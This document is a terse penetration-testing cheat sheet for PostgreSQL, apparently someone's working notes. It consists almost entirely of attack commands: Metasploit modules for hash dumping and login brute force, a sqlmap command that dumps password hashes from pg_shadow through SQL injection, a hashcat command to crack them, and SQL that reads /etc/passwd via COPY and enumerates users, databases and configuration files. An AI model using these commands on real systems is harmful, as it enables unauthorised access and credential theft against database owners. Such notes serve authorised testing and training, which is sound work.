# PostgreSQL

### MSF

```
use scanner/postgres/postgres_hashdump
use scanner/postgres/postgres_version
use scanner/postgres/postgres_login
```

### DB Accounts 

wordlists with default infra/postgresql accounts

```
ls -lh /usr/share/metasploit-framework/data/wordlists/
```

### Dumping Hashed Passwords

```
sqlmap -r request.http  --force-ssl --dump -D pg_catalog -T pg_shadow
```

### Cracking

Cracking postgres hashed passwords from postgresql

```
hashcat -m 28600 -a 0 ../pg.hashes pg.wordlist -r /usr/share/hashcat/rules/best64.rule
```

### Enumeration

<pre><code>CREATE TEMP TABLE pentest (INPUT TEXT);
<strong>COPY pentest FROM '/etc/passwd';
</strong>SELECT * FROM pentest;

select inet_server_port()
select inet_server_addr()

SELECT version()
SELECT usename FROM pg_user
SELECT datname FROM pg_database;
SELECT * FROM pg_shadow;
SELECT current_setting('data_directory');
SELECT current_setting('hba_file');
</code></pre>